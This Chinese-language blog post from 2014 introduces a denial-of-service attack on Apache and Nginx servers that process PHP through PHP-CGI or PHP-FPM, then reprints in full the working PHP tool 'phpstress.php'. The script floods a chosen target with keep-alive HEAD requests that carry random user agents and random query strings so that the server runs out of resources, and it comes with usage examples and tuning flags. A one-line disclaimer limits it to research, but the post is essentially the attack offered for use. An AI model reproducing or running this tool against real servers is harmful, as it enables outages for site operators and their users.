如果要挖井,就要挖到水出为止 [登录·注册]

吕滔博客

首页 开发 运维 工具 摄影

Apache/nginx使用PHP-FPM或PHP-CGI拒绝服务漏洞攻击

SHELL memory 发布于May 8, 2014 标签: PHP, Nginx

使用标准cable/DSL连接,这种攻击可以使用标准的HTTP请求占满一台Linux web服务器的CPU和内存。这种攻击影响使用PHP-CGI或PHP-FPM(包含WordPress站点在内)解析PHP动态内容的Apache或者NGINX web服务器。另外,这种攻击制造的请求将会在攻击后的较长时间内继续占用服务器资源。

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<?php
    #!/usr/bin/php
    /*
     
    File: phpstress.php
    Written by: d4rk0 / @d4rk0s
    Concept by: Vinny Troia / @VinnyTroia
    Night Lion Security (http://www.nightlionsecurity.com)
    ---------------------------------------------------------------------
    Description:
    This is a light-weight low-bandwidth required PHP script that creates
    a type of denial of service on a Linux-based Apache or NGINX web server
    that process PHP content with PHP-CGI (fcgid) or PHP-FPM (Apache or NGINX).
    The script will create a number of fake PHP connections, causing the server
    to quickly launch additional processes to meet the new demand. In addition,
    the server's connections are kept open (via keep-alive), causing the server
    to quickly run out of resources.
     
    In order to completely max out the server's
    resources, the script's delay parms need to both be set to 0.
     
    For more information, please view the complete post at
    http://www.nightlionsecurity.com/blog/
    ----------------------------------------------------------------------
    Disclaimer:
    Don't be a dick.
    ----------------------------------------------------------------------
    Usage:
    php phpstress.php http://www.target.com/?r=%r% -m 1000000000 -k Y -c 150 -d 0.5 -r 0.01
     
    OR
     
    php phpstress.php www.target.com/wp-content/?r=%r%
     
    Socks Proxy: * NOT IN ALPHA VERSION
    -s = Y or N / 127.0.0.1:9050 Username:Pw
    Default is N leaving out Username:Pw means there is no Username and Password
    Edit the phpstress.socks file if you want to use a socks proxy
    ----------------------------------------
    Commands:
    Target URL picking a resource intense page and inserting %r where the GET variables data is will generate random chars
    -m = Maximum requests not specifying this will leave it at a large default number to exit script on
    *nix flavored simply press control c to kill the program and exit or whatever TTY command you have setup
    to exit a program on command line
    Default value is 1000000000
     
    -k = Y or N Keep Alive Check will check if Server uses the Keep-Alive Option to keep the connection alive
    Default value is Y
     
    -c = Maximum Request Per Connection each connection opened will then request D number of times
    Default value of 150
    -d = Delay Between Connections The number of seconds to delay between opening a new connection.
    Default value: 0.5
    -r = Delay Between Requests The number of seconds to delay between outgoing requests.
    Default value: 0.04
     
    */
    // BEGIN SCRIPT
    error_reporting(0);
    // make sure script has no time limit for execution
    set_time_limit(0);
     
     
    /*
    Randomly pick a UserAgent for deployment on page request
    PARAM: None
    RETURN: returns a random user agent string
    */
    function userAgentRand(){
     
    // lets create our array with random user agents
    $userArray = array("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; RW; rv:1.8.0.7) Gecko/20110321 MultiZilla/4.33.2.6a SeaMonkey/8.6.55",
    "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:1.8.0.7) Gecko/20110321 MultiZilla/4.33.2.6a SeaMonkey/8.6.55",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
    "Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)",
    "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)".
    "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
    "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10".
    "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.2; RW; rv:7.0a1) Gecko/20091211 SeaMonkey/9.23a1pre",
    "Mozilla/5.0 (Windows NT 5.2; RW; rv:7.0a1) Gecko/20091211 SeaMonkey/9.23a1pre");
     
     
    // Lets shuffle our array
    shuffle($userArray);
    // count how many user agents in array
    $count = count($userArray);
    // minus one to adjust starting at 0
    $count = mt_rand(0,$count-1);
    // return "Random" User Agent
    return $userArray[$count];
     
    }
     
     
     
     
    /*
    Function used for adding random string to request urls
    PARAM: none
    RETURN: returns random string of chars
    */
    function quick_rand(){
    $rand_string = "";
    $letters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
    for($i=0;$i<mt_rand(5,16);$i++){
    $rand_string.=$letters[array_rand($letters)];
    }
    return($rand_string);
    }
     
     
     
    /*
    Parse the target URL to return the host, path and query
    PARAM: the URL string to be parsed
    RETURN: returns an array of host path & query
    */
    function parseUrl($target_url){
     
     
     
    $t = "";
    $t = strpos($target_url,'http://');
    if ($t === false) {
    $target_url = "http://". $target_url;
    }
     
    $target_url_parsed = parse_url($target_url);
     
    $target_url = array();
    $target_url['scheme'] = $target_url_parsed['scheme'];
    $target_url['host'] = $target_url_parsed['host'];
    $target_url['path'] = $target_url_parsed['path'];
    $target_url['query'] = $target_url_parsed['query'];
    $target_url['port'] = $target_url_parsed['port'];
     
    if(!$target_url['path']){
    $target_url['path'] = '/';
    }
     
    if(!$target_url['port']){
    $target_url['port'] = 80;
    }
    if ($target_url['scheme']){
    // return Parsed Array for Deployment and usage
    return $target_url;
    }else{
    // return proper url array
    $target_url['host'] = "http://". $target_url['host'];
    return $target_url;
    }
     
     
    }
     
     
     
    /*
    Check Query if none just append path if both append path + query
    PARAM: the parsed array of target url
    RETURN: return appended array
    */
    function checkQuery($target_url){
     
    if($target_url['query']){
    $request_url = $target_url['path']."?".$target_url['query'];
    } else {
    $request_url = $target_url['path'];
    }
    // return request url
    return $request_url;
    }
     
     
    /*
    check if user is launching this from command line or browser
    PARAM: none
    RETURN: return 1=browser or 0=command line
    */
    function checkCommandLine(){
    if(defined('STDIN')){
    $num = 0;
    }else{
    $num = 1;
    }
    return $num;
    }
     
     
     
    /*
    Check if the remote host supports Keep-Alive
    PARAM: parsed target URL
    RETURN: either keep-alive or server doesn't support keep alive string
    */
    function keepAlive($target_url){
     
    // Grab random user agent
    $useragent = userAgentRand();
     
    // Send request with Keep-Alive header
    $socket = fsockopen($target_url['host'], $target_url['port'], $errno, $errstr, 3);
    // if connection cant open
    if(!$socket){
    die("Uh-oh: Failed to open a connection to ".$target_url['host']." on port ".$target_url['port']."\n\n");
    }
     
     
     
    // lets build payload for keep-alive check
    $request = "HEAD / HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".
    $useragent."\r\nConnection: Keep-Alive\r\n\r\n";
    fwrite($socket, $request);
    $reply = "";
    // loop until end of buffer and socket stream
    while (!feof($socket)){
     
    $buffer=fgets($socket, 128);
    $reply.=$buffer;
     
    //Watch for end of reply and close socket/break out of loop
    if($buffer == "\r\n"){
    fclose($socket); break;
    }
    }
     
     
    //Check if the reply to our above request includes 'Connection: close
    if(strpos($reply, "Connection: close")){
    return "NO:KEEP-ALIVE";
    }else{ return "KEEP-ALIVE"; }
     
     
    }
     
     
    /*
    This is the actual attack that will test the stress on the server
    PARAM: target_url , request url , max requests , max request per connection
    RETURN: returns TRUE
    */
    function sendphpstress($target_url,$request_url,$mr,$mpc,$dbr,$dbc){
     
    // max requests divided by max requests per connection
    $max_connections = ceil($mr / $mpc);
     
    echo "[!] To exit press control C or whatever TTY options are set to exit command line program\n\n\n";
    // lets loop through connections
    for($c=0;$c<$max_connections;$c++){
     
    echo "Opening connection [".($c+1)."] to ".$target_url['host']."..";
    @$attack_socket = fsockopen($target_url['host'], $target_url['port'], $errno, $error, 3);
     
    // cant open socket display fail
    if(!$attack_socket){
    echo "failed (".$error.")"."\n";
    } else {
     
    // Success lets send out connections
    echo "success"."\n"."Sending requests: |";
     
    //Stay within our max_requests_per_connection limit
    for($r=0;$r<$mpc;$r++){
    // grab a ran user agent
    $useragent = userAgentRand();
     
    // build payload for attack
    $request = "HEAD ".str_replace("%r%", quick_rand(), $request_url)." HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".$useragent."\r\nConnection: Keep-Alive\r\n\r\n";
     
    // write socket and make connection
    @fwrite($attack_socket, $request);
     
    echo ".";
     
    // Delay between requests 1 second requests
    usleep($dbr * 1000000);
     
    }
     
    echo "|"."\n";
     
    }
     
    @fclose($attack_socket);
    echo "Closed connection"."\n";
    // amount of time to delay between connections
    usleep($dbc * 1000000);
     
    }
     
    return True;
     
    }
     
     
     
    /*
    This function takes all the commands and outputs them strips them and gets them ready for proper use
    PARAM: the argv array of commands to be processed
    RETURN: returns processed array or FALSE for error
    */
    function inputCommand($commands){
     
    // Take Commands Being Passed return values as array
    $outputCommand = array();
    // count number of commands for loop
    $count = count($commands);
     
    // loop through commands
    for ($d = 0; $d < $count; $d++){
    // lets build commands
    switch ($commands[$d]){
     
    // Display help list of commands and exit
    case "--help":	
    return "HELP";
    // Display help list of commands and exit
    case "-":
    return "HELP";
    // socks proxy
    case "-s":	
    $outputCommand[] = "-s";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
     
    // target
    case "-t":	
    $outputCommand[] = "-t";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    // Grab Target ////////////////
    break;
    // maximum requests
    case "-m":	
    $outputCommand[] = "-m";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    // Grab Target ////////////////
    break;
     
    // keep alive yes or no
    case "-k":	
    $outputCommand[] = "-k";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
    // maximum request per connection
    case "-c":	
    $outputCommand[] = "-c";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
    // delay between connections
    case "-d":	
    $outputCommand[] = "-d";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
    // delay between requests
    case "-r":	
    $outputCommand[] = "-r";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
    }
     
    }
     
    // return array with results
    return $outputCommand;
     
     
     
    }
    /*
    Check if we are on command line or not
    PARAM: NONE
    RETURN: NONE exits if true
    */
    function commandLineCheck(){
    // Check if not command line exit dont do anything
    if ($num = checkCommandLine() === 1){
    // return error to user and quit script
    echo "<h1><B>Error: phpstress only runs from command line prompt</b></h1>";
    exit(0);
    }
     
    }
     
     
    /*
    Displays the Help menu showing all available program commands
    PARAM: NONE
    RETURN: NONE exits
    */
    function displayHelp(){
    echo "
    PHPStress 1.0
    Usage: php phpstress.php [url] [options]
     
    OPTIONS:
    -t: Target URL picking a resource intense page and inserting %r
    where the GET variables data is will generate random chars
    -m: Maximum requests not specifying this will leave it at a large default number
    Default value is 1000000000
     
    -k: Keep Alive Check will check if Server uses the Keep-Alive Option
    to keep the connection alive (Y or N)
    Default value is Y
     
    -c: Maximum Request Per Connection each connection opened will
    then request D number of times
    Default value of 150
     
    -d: Delay Between Connections - The number of seconds to delay
    between opening a new connection.
    Default value: 0.5
     
    -r: Delay Between Requests The number of seconds to delay between
    outgoing requests
    Default value: 0.04 \n\n";
    exit(0);
     
    }
     
     
    /// END FUNCTIONS BEGIN ACTUAL SCRIPT
    //*********************************************************
    // check if on command line
    commandLineCheck();
     
     
    // sleep for a couple seconds before going
    //echo " [X] Processing Commands Now lets begin Attack.";
    //@usleep(1000666);
     
    // check if arguments on commmand line are present
    if (isset($argv[1])) {
    // Process commands now
    $results = inputCommand($argv);
    // display help
    if ($results === "HELP"){
    // display help
    displayHelp();
    }
     
     
    // Set counter Values
    $d = 0;
    $num = "";
    /////////////////////
    // Set Program Default Variables
    $target_url = "";
    $socks = "n";
    $k = "y";
    $mr = 10000000;
    $mpc = 150;
    $dbr = 0.02;
    $dbc = 0.7;
     
     
     
     
    // lets assign all variables now and get ready for attack
    foreach($results as $key=>$com){
     
    // Socks proxy default N
    if ($com == "-s"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $socks = $results[$r];
    }
    // Maximum requests Default is 100000000
    if ($com == "-m"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $mr = $results[$r];
    }
    // Check is server keep alive? default is Y
    if ($com == "-k"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $k = $results[$r];
    }
    // Max request per connection
    if ($com == "-c"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $mpr = $results[$r];
    }
    // delay between connections
    if ($com == "-d"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $dbc = $results[$r];
    }
    // delay between requests
    if ($com == "-r"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $dbr = $results[$r];
    }
    }
     
     
    // append url now
    $target_url = $argv[1];
     
    // Lets now check and set Default values
    if (($target_url == "") || empty($target_url)){
    // Error no Target URL set
    echo " [!] ERROR: No Target URL set. \n";
    exit(0);
    }
     
     
    // Socks check now
    if ((strtolower($socks) == "n") || (strtolower($socks) == "y")){}else{
    // error socks is either a n or y question
    echo " [!] ERROR: Socks is either a [y]es or [n]o question\n\n";
    exit(0);
    }
     
    // keep alive
    if (strtolower($k) != "n" || strtolower($k) != "y"){}else{
    // error socks is either a n or y question
    echo " [!] ERROR: Keep Alive is either a [y]es or [n]o question\n";
    exit(0);
    }
     
    // Max request check now
    if ((is_numeric($mr)) || ($mr != "") || (!empty($mr))){}else{
    // error max request is not a number
    echo " [!] ERROR: Max Request must be a valid number. Default is 100000000\n";
    exit(0);
    }
     
    // Max per connection
    if ((is_numeric($mpc)) || ($mpc != "") || (!empty($mpc))){}else{
    // error max request is not a number
    echo " [!] ERROR: Max Request Per Connection is invalid. Default is 150\n";
    exit(0);
    }
     
    // Delay between request
    if ((is_numeric($dbr)) || ($dbr != "") || (!empty($dbr))){}else{
    // error
    echo " [!] ERROR: Delay between requests is invalid. Default is 0.04 seconds. \n";
    exit(0);
    }
     
    // Delay between connections
    if ((is_numeric($dbc)) || ($dbc != "") || (!empty($dbc))){}else{
    // error
    echo " [!] ERROR: Delay between connections is invalid. Default is 0.5 seconds. \n";
    exit(0);
    }
     
    }else{
    // display help
    displayHelp();
    exit(0);
    }
     
     
     
    // parse target url return a parsed array
    $target_url = parseUrl($target_url);
    // check if query empty or not empty
    $request_url = checkQuery($target_url);
     
     
    if ($k == "y"){
    // check if server supports keep-alive make sure its a parsed target url
    $keepAlive = keepAlive($target_url);
    // Switch to check results if server keeps alive
    switch ($keepAlive){
    case "NO:KEEP-ALIVE":
    $mpc = 1;
    break;
    case "KEEP-ALIVE":
    $mpc = 100;
    break;
    }
    }
     
     
     
    // send out payloads and connection
    sendphpstress($target_url,$request_url,$mr,$mpc,$dbr,$dbc);
     
     
     
    // EOF
?>

相关推荐

添加新评论

网站状态

  • 栏目分类:49个
  • 发布文章:1505篇
  • 用户评论:712条
  • 开博至今:4035天

正则速查

[abc] 匹配中括号中的单个字符,如a或b或c
[^abc] 匹配除了a、b、c等字符的其他单个字符
[a-z] 匹配一个字符范围,如a到z
[a-zA-Z] 匹配一个字符范围,如a-z 或 A-Z
^ 匹配行的开始
$ 匹配行的结束
\A 匹配一个字符串的开始
\z 匹配一个字符串的结束
. 匹配任意单个字符
\s 匹配空白字符,如空格,TAB
\S 匹配非空白字符
\d 匹配一个数字
\D 匹配非数字
\w 匹配一个字母
\W 匹配非字母
\b 匹配字符边界
(...) 引用所有括号中的内容
(a|b) a或者b
a? 零个或1个a
a* 零个或多个a
a+ 1个或多个a
a{3} 3次重复的a
a{3,} 3次或3次以上重复的a
a{3,6} 3到6次重复的a

修正符

/g 查找所有可能的匹配
/i 不区分大小写
/m 多行匹配
/s 单行匹配
/x 忽略空白模式
/e 可执行模式,PHP专有
/A 强制从目标字符串开头匹配
/D 使用$限制结尾字符,则不允许结尾有换行
/U 只匹配最近的一个字符串;不重复匹配

最新回复

  • 7ee5bec831b4e528c3a1d46ab8dd40c9: pid是传入当前获取的id值.在后台查询当前这个id值下的下级分类.
  • Uncaught ReferenceError: form is not defined: Uncaught ReferenceError: form is...
  • 春熙路: 8年的老博主了、致敬
  • hello: hello world
  • memory: 好的,感谢您的反馈。翻译完了也没有校验。。。 检查了一下,med...
  • jiangnvshi: 不知道你还记不记得之前你翻译的medoo文档:http://me...
  • 态度xiaomi: 不错不错。
  • memory: 回头我写个php的demo.
  • zjj: 请问有没有具体pid使用的方法呢?
  • 潇湘居士: 恩,如果是在局域网内部进行系统迁移,我们对比过 SSH 的压缩和...
  • memory: 文中的方案还是比较局限,个人认为还是适合主机迁移的时候比较好使。...
  • 潇湘居士: 使用 axel 或者 aria2 开启多线程下载,同样能达到相同...
  • 八角网赚站: 竟然还有这种操作
  • memory: 以前还有站点统计或百度统计撒的,这两产品到了今年已经开始不争气啦...
  • 夏日博客: 原来 Nginx 还有可以这样分析统计。
  • tomxuetao: 能个实例吗?
  • memory: 哈哈哈。。。话说也没毛病。